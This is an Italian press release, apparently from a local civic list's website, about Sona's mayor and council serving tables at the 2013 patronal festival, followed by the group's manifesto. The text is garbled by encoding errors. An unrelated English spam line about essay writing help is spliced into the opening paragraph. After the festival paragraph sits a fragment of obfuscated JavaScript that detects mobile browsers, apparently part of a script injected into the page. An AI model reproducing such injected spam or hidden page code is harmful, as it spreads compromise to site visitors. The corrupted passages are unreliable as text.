Sagra di Sona: farsi servire dal Sindaco e dalla Giunta non ha prezzo!

COMUNICATO STAMPA

Sona, 25 Agosto 2013

Sagra di Sona: farsi servire dal Sindaco e dalla Giunta non ha prezzo

L’Amministrazione comunale di Sona (Verona) indosserAi?? la divisa di cameriere e servirAi?? It allows its users to share files, manage projects, track essay writing help their activity and collaborate with others. ai tavoli della sagra patronale del capoluogo il 2 Settembre prossimo.

“Stare a contatto con i cittadini A? il primo obiettivo che ogni amministratore dovrebbe avere – afferma il Sindaco Gianluigi Mazzi – e noi lo vogliamo mettere in pratica a partire proprio dagli importantissimi momenti di aggregazione che sono le sagre. Non A? piA? tempo di avere tavoli riservati per le autoritAi??: queste, al contrario, sono cittadini che per un periodo di tempo hanno un compito di amministratori. Ma rimangono e rimaniamo cittadini e non occorre dimenticarlo mai.”

“Crediamo molto in queste attivitAi?? – spiega il Vice Sindaco Simone Caltagirone – che eliminano le barriere tra amministratori e cittadini: tutti noi siamo cittadini e proveniamo dall’associazionismo. Sappiamo quanto sia importante il servizio, la passione e il volontariato.”

“Con questa semplice iniziativa – afferma il Sindaco Gianluigi Mazzi – vogliamo connotare uno stile di Amministrazione.Ai?? Molti volontari e associazioni del nostro territorio da anni offrono il loro tempo per la comunitAi?? intera, perchAi?? lai??i??Amministrazione Comunale non deve applicare le stesse buone pratiche?”

“Siamo molto incuriositi da questa proposta – afferma un organizzatore della sagra patronale – perchAi?? A? la prima volta che accade che un’Amministrazione “scenda” dal palazzo e si metta affianco a noi. Se sapranno servire bene li recluteremo anche per il prossimo anno” ironizza.

Il Sindaco, gli Assessori, i consiglieri e tutti i simpatizzanti prenderanno ordinazioni e serviranno al tavolo.

“Mentre gireremo tra i tavoli raccoglieremo anche le lamentazioni e i suggerimenti dei cittadini – dice il vice sindaco Simone Caltagirone-, non solo culinari. Quella sera, perA?, la principale preoccupazione sarAi?? di non rompere troppi piatti” conclude.

La sagra di San Luigi di Sona A? ormai un appuntamento storico per il capoluogo il cui programma completo A? reperibile presso il sito della proloco locale ( ). lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.